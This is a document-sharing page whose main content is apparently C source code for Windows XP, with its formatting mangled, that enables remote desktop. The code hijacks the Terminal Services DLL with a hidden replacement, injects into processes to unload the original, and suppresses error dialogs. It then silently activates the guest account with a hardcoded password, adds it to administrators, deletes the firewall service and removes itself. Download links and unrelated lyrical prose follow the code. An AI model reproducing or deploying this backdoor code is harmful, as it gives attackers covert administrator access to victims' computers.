xp下双开3389源码Word文件下载.docx
《xp下双开3389源码Word文件下载.docx》由会员分享,可在线阅读,更多相关《xp下双开3389源码Word文件下载.docx(11页珍藏版)》请在冰豆网上搜索。
pe);
dwRet
dwRet=Process32Next(hSP,&
pe))
if(lstrcmpi(szProcName,pe.szExeFile)==0)
dwPid=pe.th32ProcessID;
bFound=TRUE;
break;
}
CloseHandle(hSP);
if(bFound==TRUE)
returndwPid;
returnNULL;
boolCALLBACKEnumWindowsProc(HWNDhwnd,LPARAMlParam)
if(!
IsWindowVisible(hwnd))returntrue;
DWORDdwWindowThreadId=NULL;
DWORDdwLsassId=(DWORD)lParam;
GetWindowThreadProcessId(hwnd,&
dwWindowThreadId);
if(dwWindowThreadId==(DWORD)lParam)
//关闭指定进程的窗口
SendMessage(hwnd,WM_CLOSE,0,0);
returntrue;
//写注册表的指定键的数据(Mode:
0-新建键数据1-设置键数据2-删除指定键3-删除指定键项)fromNameLess114
intWriteRegEx(HKEYMainKey,LPCTSTRSubKey,LPCTSTRVname,DWORDType,char*szData,DWORDdwData,intMode)
HKEYhKey;
DWORDdwDisposition;
intiResult=0;
__try
//SetKeySecurityEx(MainKey,Subkey,KEY_ALL_ACCESS);
switch(Mode)
case0:
if(RegCreateKeyEx(MainKey,SubKey,0,NULL,REG_OPTION_NON_VOLATILE,KEY_ALL_ACCESS,NULL,&
hKey,&
dwDisposition)!
=ERROR_SUCCESS)
__leave;
case1:
if(RegOpenKeyEx(MainKey,SubKey,0,KEY_READ|KEY_WRITE,&
hKey)!
switch(Type)
caseREG_SZ:
caseREG_EXPAND_SZ:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)szData,strlen(szData)+1)==ERROR_SUCCESS)
iResult=1;
caseREG_DWORD:
if(RegSetValueEx(hKey,Vname,0,Type,(LPBYTE)&
dwData,sizeof(DWORD))==ERROR_SUCCESS)
caseREG_BINARY:
case2:
if(RegOpenKeyEx(MainKey,SubKey,NULL,KEY_READ|KEY_WRITE,&
if(RegDeleteKey(hKey,Vname)==ERROR_SUCCESS)
case3:
if(RegDeleteValue(hKey,Vname)==ERROR_SUCCESS)
__finally
RegCloseKey(MainKey);
RegCloseKey(hKey);
returniResult;
boolDebugPrivilege(constchar*PName,BOOLbEnable)
BOOLbResult=TRUE;
HANDLEhToken;
TOKEN_PRIVILEGESTokenPrivileges;
OpenProcessToken(GetCurrentProcess(),TOKEN_QUERY|TOKEN_ADJUST_PRIVILEGES,&
hToken))
bResult=FALSE;
returnbResult;
TokenPrivileges.PrivilegeCount=1;
TokenPrivileges.Privileges[0].Attributes=bEnable?
SE_PRIVILEGE_ENABLED:
0;
LookupPrivilegeValue(NULL,PName,&
TokenPrivileges.Privileges[0].Luid);
AdjustTokenPrivileges(hToken,FALSE,&
TokenPrivileges,sizeof(TOKEN_PRIVILEGES),NULL,NULL);
if(GetLastError()!
CloseHandle(hToken);
boolUnloadRemoteModule(DWORDdwProcessID,HANDLEhModuleHandle)
HANDLEhRemoteThread;
HANDLEhProcess;
if(hModuleHandle==NULL)returnfalse;
hProcess=:
:
OpenProcess(PROCESS_VM_WRITE|PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION,FALSE,dwProcessID);
if(hProcess==NULL)returnfalse;
HMODULEhModule=:
GetModuleHandle(”kernel32.dll”);
LPTHREAD_START_ROUTINEpfnStartRoutine=(LPTHREAD_START_ROUTINE):
GetProcAddress(hModule,“FreeLibrary”);
hRemoteThread=:
CreateRemoteThread(hProcess,NULL,0,pfnStartRoutine,hModuleHandle,0,NULL);
if(hRemoteThread==NULL)
CloseHandle(hProcess);
returnfalse;
WaitForSingleObject(hRemoteThread,INFINITE);
CloseHandle(hRemoteThread);
HANDLEFindModule(DWORDdwProcessID,LPCTSTRlpModulePath)
HANDLEhModuleHandle=NULL;
MODULEENTRY32me32={0};
HANDLEhModuleSnap=:
CreateToolhelp32Snapshot(TH32CS_SNAPMODULE,dwProcessID);
me32.dwSize=sizeof(MODULEENTRY32);
if(:
Module32First(hModuleSnap,&
me32))
do
lstrcmpi(me32.szExePath,lpModulePath))
hModuleHandle=me32.hModule;
}while(:
Module32Next(hModuleSnap,&
me32));
CloseHandle(hModuleSnap);
returnhModuleHandle;
boolUnloadModule(LPCTSTRlpModulePath)
BOOLbRet=false;
PROCESSENTRY32pe32;
pe32.dwSize=sizeof(pe32);
HANDLEhProcessSnap=:
CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
//查找相关的进程
Process32First(hProcessSnap,&
pe32))
HANDLEhModuleHandle=FindModule(pe32.th32ProcessID,lpModulePath);
if(hModuleHandle!
=NULL)
bRet=UnloadRemoteModule(pe32.th32ProcessID,hModuleHandle);
}while(Process32Next(hProcessSnap,&
pe32));
CloseHandle(hProcessSnap);
returnbRet;
voidStartService(LPCTSTRlpService)
SC_HANDLEhSCManager=OpenSCManager(NULL,NULL,SC_MANAGER_CREATE_SERVICE);
if(NULL!
=hSCManager)
SC_HANDLEhService=OpenService(hSCManager,lpService,DELETE|SERVICE_START);
=hService)
StartService(hService,0,NULL);
CloseServiceHandle(hService);
CloseServiceHandle(hSCManager);
BOOLReleaseResource(WORDwResourceID,LPCTSTRlpType,LPCTSTRlpFileName)
HGLOBALhRes;
HRSRChResInfo;
HANDLEhFile;
DWORDdwBytes;
hResInfo=FindResource(NULL,MAKEINTRESOURCE(wResourceID),lpType);
if(hResInfo==NULL)returnFALSE;
hRes=LoadResource(NULL,hResInfo);
if(hRes==NULL)returnFALSE;
hFile=CreateFile(lpFileName,GENERIC_WRITE,FILE_SHARE_WRITE,NULL,
CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,NULL);
if(hFile==NULL)returnFALSE;
WriteFile(hFile,hRes,SizeofResource(NULL,hResInfo),&
dwBytes,NULL);
CloseHandle(hFile);
returnTRUE;
voidSetReg()
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Services//TermService”,”Start”,REG_DWORD,NULL,2,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SOFTWARE//Microsoft//WindowsNT//CurrentVersion//Winlogon”,“KeepRASConnections”,REG_SZ,“1″,0,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Control//TerminalServer”,“fDenyTSConnections”,REG_DWORD,NULL,0,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Control//TerminalServer//LicensingCore”,“EnableConcurrentSessions”,REG_DWORD,NULL,1,0);
WriteRegEx(HKEY_LOCAL_MACHINE,“SYSTEM//CurrentControlSet//Services//TermService//Parameters”,“ServiceDll”,REG_EXPAND_SZ,“%SystemRoot%//system32//termsrvhack.dll”,0,0);
voidReleaseDll()
charstrSystemPath[MAX_PATH];
charstrDllcachePath[MAX_PATH];
GetSystemDirectory(strSystemPath,sizeof(strSystemPath));
GetSystemDirectory(strDllcachePath,sizeof(strDllcachePath));
lstrcat(strSystemPath,“//termsrvhack.dll”);
lstrcat(strDllcachePath,“//dllcache//termsrvhack.dll”);
ReleaseResource(IDR_DLL,“BIN”,strSystemPath);
ReleaseResource(IDR_DLL,“BIN”,strDllcachePath);
SetFileAttributes(strSystemPath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
SetFileAttributes(strDllcachePath,FILE_ATTRIBUTE_HIDDEN|FILE_ATTRIBUTE_READONLY|FILE_ATTRIBUTE_SYSTEM);
boolIsOSXP()
OSVERSIONINFOEXOsVerInfoEx;
OsVerInfoEx.dwOSVersionInfoSize=sizeof(OSVERSIONINFOEX);
GetVersionEx((OSVERSIONINFO*)&
OsVerInfoEx);
//注意转换类型
returnOsVerInfoEx.dwMajorVersion==5&
&
OsVerInfoEx.dwMinorVersion==1;
voidHijackService()
charstrDll[MAX_PATH];
GetSystemDirectory(strDll,sizeof(strDll));
lstrcat(strDll,“//termsrv.dll”);
//释放termsrvhack.dll
ReleaseDll();
//遍历进程卸载现在加载的DLL
DebugPrivilege(SE_DEBUG_NAME,TRUE);
UnloadModule(strDll))return;
DebugPrivilege(SE_DEBUG_NAME,FALSE);
//关闭要弹出的出错对话框和因DLL强制卸载使一些服务异常终止而弹出来的自动关机对话框
//对进程赋予关闭权限
DebugPrivilege(SE_SHUTDOWN_NAME,TRUE);
DWORDdwLsassId=GetProcessId(”csrss.exe”);
while(!
AbortSystemShutdown(NULL))
//一些系统是会弹出drwtsn32.exe
DWORDdwDrwtsn32Id=GetProcessId(”drwtsn32.exe”);
if(dwDrwtsn32Id!
EnumWindows((WNDENUMPROC)EnumWindowsProc,(LPARAM)dwDrwtsn32Id);
//模块强制卸载时会出错,关闭csrss.exe进程弹出的出错窗口
EnumWindows((WNDENUMPROC)EnumWindowsProc,(LPARAM)dwLsassId);
Sleep(10);
DebugPrivilege(SE_SHUTDOWN_NAME,FALSE);
intWINAPIWinMain(HINSTANCEhInstance,HINSTANCEhPrevInstance,previousinstance
LPSTRlpCmdLine,intnCmdShow)
//一些注册表的操作
SetReg();
if(IsOSXP())
//替换DLL
HijackService();
//开始终端服务
StartService(”TermService”);
//激活guest,加管理员组,自删除,停止XP自带的防火墙,并删除它
charstrCommand[1024];
charstrSelf[MAX_PATH];
GetModuleFileName(NULL,strSelf,sizeof(strSelf));
wsprintf(strCommand,“cmd.exe/cnetuserguest/active:
yes&
netuserguestcooldiyer&
netlocalgroupadministratorsguest/add&
netstopSharedAccess/y&
del/”%s/”&
scdeleteSharedAccess”,strSelf);
WinExec(strCommand,SW_HIDE);
return0;
}
//http:
//201314.free.fr/attachments/200805/xp3389_bin.rar//http:
//201314.free.fr/attachments/200805/xp3389_src.rar
倚窗远眺,目光目光尽处必有一座山,那影影绰绰的黛绿色的影,是春天的颜色。
周遭流岚升腾,没露出那真实的面孔。
面对那流转的薄雾,我会幻想,那里有一个世外桃源。
在天阶夜色凉如水的夏夜,我会静静地,静静地,等待一场流星雨的来临…
许下一个愿望,不乞求去实现,至少,曾经,有那么一刻,我那还未枯萎的,青春的,诗意的心,在我最美的年华里,同星空做了一次灵魂的交流…
秋日里,阳光并不刺眼,天空是一碧如洗的蓝,点缀着飘逸的流云。
偶尔,一片飞舞的落叶,会飘到我的窗前。
斑驳的印迹里,携刻着深秋的颜色。
在一个落雪的晨,这纷纷扬扬的雪,飘落着一如千年前的洁白。
窗外,是未被污染的银白色世界。
我会去迎接,这人间的圣洁。
在这流转的岁月里,有着流转的四季,还有一颗流转的心,亘古不变的心。